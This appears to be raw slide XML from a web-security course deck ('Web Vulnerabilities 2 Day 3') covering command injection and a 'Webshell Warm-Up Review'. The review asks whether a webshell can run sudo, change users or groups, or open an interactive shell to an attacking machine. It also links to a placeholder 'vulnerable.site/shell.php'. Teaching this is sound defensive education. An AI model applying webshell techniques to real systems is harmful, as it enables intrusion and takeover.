          <p:cNvPr id="1424" name="Google Shape;1424;g604529979b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5" name="Google Shape;1425;g604529979b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0" name="Shape 1430"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1431" name="Google Shape;1431;g604529979b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604529979b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9" name="Shape 1439"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1440" name="Google Shape;1440;g604529979b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604529979b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7" name="Shape 1057"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1058" name="Google Shape;1058;g597323afd7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597323afd7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6" name="Shape 1446"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1447" name="Google Shape;1447;g604529979b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604529979b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5" name="Shape 1455"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1456" name="Google Shape;1456;g604529979b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7" name="Google Shape;1457;g604529979b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2" name="Shape 1462"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1463" name="Google Shape;1463;g604529979b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604529979b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1" name="Shape 1471"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1472" name="Google Shape;1472;g58e070b8a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3" name="Google Shape;1473;g58e070b8a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5" name="Shape 1065"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1066" name="Google Shape;1066;g597323afd7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597323afd7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3" name="Shape 1073"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1074" name="Google Shape;1074;g604529979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604529979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1" name="Shape 1081"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;g604529979b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604529979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3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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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4.pn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5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2.png"/><Relationship Id="rId4"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2.png"/><Relationship Id="rId4"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26.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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34.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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5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49.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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57.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.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5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png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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64.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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30.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8.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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81.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image106.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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8" name="Google Shape;448;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9" name="Google Shape;449;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0" name="Google Shape;450;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2" name="Google Shape;452;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6"/>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26"/>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26"/>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26"/>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26"/>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464" name="Shape 464"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Google Shape;465;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7" name="Google Shape;467;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8" name="Google Shape;468;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0" name="Google Shape;470;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8" name="Google Shape;488;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49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 name="Google Shape;494;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5" name="Google Shape;49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6" name="Google Shape;49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8" name="Google Shape;498;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9" name="Google Shape;499;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06" name="Google Shape;506;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10"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529"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548"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567"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4" name="Google Shape;584;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589"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2" name="Google Shape;592;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3" name="Google Shape;593;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4" name="Google Shape;594;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6" name="Google Shape;596;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2" name="Google Shape;602;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6" name="Google Shape;606;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1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5" name="Google Shape;615;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6" name="Google Shape;616;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8" name="Google Shape;618;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5" name="Google Shape;625;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6" name="Google Shape;626;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8" name="Google Shape;628;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33"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6" name="Google Shape;636;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7" name="Google Shape;637;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8" name="Google Shape;638;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0" name="Google Shape;640;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50" name="Google Shape;650;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655"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9" name="Google Shape;659;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0" name="Google Shape;660;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2" name="Google Shape;662;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0" name="Google Shape;670;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2" name="Google Shape;672;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4" name="Google Shape;674;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680"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4" name="Google Shape;684;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5" name="Google Shape;685;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7" name="Google Shape;687;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8" name="Google Shape;698;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9" name="Google Shape;699;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05"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9" name="Google Shape;70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10" name="Google Shape;710;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2" name="Google Shape;712;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4" name="Google Shape;724;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30"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4" name="Google Shape;734;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5" name="Google Shape;735;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7" name="Google Shape;737;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8" name="Google Shape;748;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9" name="Google Shape;749;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755"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9" name="Google Shape;759;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0" name="Google Shape;760;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2" name="Google Shape;762;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6" name="Google Shape;776;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783"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6" name="Google Shape;786;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7" name="Google Shape;787;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8" name="Google Shape;788;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0" name="Google Shape;790;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2" name="Google Shape;792;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8" name="Google Shape;798;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2" name="Google Shape;802;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4" name="Google Shape;804;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1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5" name="Google Shape;815;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6" name="Google Shape;816;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8" name="Google Shape;818;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4" name="Google Shape;824;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6" name="Google Shape;826;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8" name="Google Shape;828;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2" name="Google Shape;832;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839"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2" name="Google Shape;842;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3" name="Google Shape;843;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4" name="Google Shape;844;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6" name="Google Shape;846;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2" name="Google Shape;852;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8" name="Google Shape;858;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0" name="Google Shape;860;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867" name="Shape 867"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="868" name="Google Shape;86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0" name="Google Shape;87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1" name="Google Shape;871;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3" name="Google Shape;873;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6" name="Google Shape;886;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0" name="Google Shape;890;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898" name="Shape 898"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="899" name="Google Shape;89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1" name="Google Shape;90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9" name="Google Shape;909;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1" name="Google Shape;911;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3" name="Google Shape;913;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1" name="Google Shape;921;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29" name="Shape 929"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="930" name="Google Shape;93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2" name="Google Shape;93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2" name="Google Shape;942;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2" name="Google Shape;952;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960" name="Shape 960"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="961" name="Google Shape;961;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3" name="Google Shape;963;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1" name="Google Shape;971;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3" name="Google Shape;973;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5" name="Google Shape;975;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7" name="Google Shape;977;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9" name="Google Shape;979;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3" name="Google Shape;983;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91" name="Shape 991"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="992" name="Google Shape;992;p4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993" name="Google Shape;993;p48"/>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94" name="Google Shape;994;p4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995" name="Shape 995"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="996" name="Google Shape;996;p4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97" name="Google Shape;997;p49"/>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8" name="Google Shape;998;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9" name="Google Shape;999;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0" name="Google Shape;1000;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1" name="Google Shape;1001;p49"/>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2" name="Google Shape;1002;p49"/>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1003" name="Shape 1003"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1004" name="Google Shape;1004;p5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5" name="Google Shape;1005;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6" name="Google Shape;1006;p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7" name="Google Shape;1007;p50"/>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8" name="Google Shape;1008;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1009" name="Shape 1009"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010" name="Google Shape;1010;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1" name="Google Shape;1011;p51"/>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12" name="Google Shape;1012;p51"/>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51"/>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1014" name="Shape 1014"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1015" name="Google Shape;1015;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6" name="Google Shape;1016;p52"/>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17" name="Google Shape;1017;p52"/>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8" name="Google Shape;1018;p52"/>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hyperlink" Target="https://vulnerable.site/shell.php"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9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9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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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hyperlink" Target="https://vulnerable.site/shell.php"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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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2" name="Shape 1022"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1023" name="Google Shape;1023;p53"/>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Web Vulnerabilities 2 Day 3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024" name="Google Shape;1024;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="1440025"/>
            <a:ext cx="8595300" cy="1248000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="457200" lIns="2880350" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1025" name="Google Shape;1025;p53"/>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p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="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2" name="Shape 1092"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1093" name="Google Shape;1093;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Webshell Warm-Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1094" name="Google Shape;1094;p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95" name="Google Shape;1095;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="665950"/>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Thinking Critically</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1096" name="Google Shape;1096;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="64550" y="1163000"/>
            <a:ext cx="9144000" cy="1302600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Can you use a webshell to run commands with sudo? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Can you use a webshell to add or modify a user, or change group membership? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Can you use a webshell to open an interactive shell to an attacking machine? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a: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0" name="Shape 1100"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1101" name="Google Shape;1101;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Webshell Warm-Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1102" name="Google Shape;1102;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03" name="Google Shape;1103;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="665950"/>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Thinking Critically</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1104" name="Google Shape;1104;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="64550" y="1163000"/>
            <a:ext cx="9144000" cy="1302600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
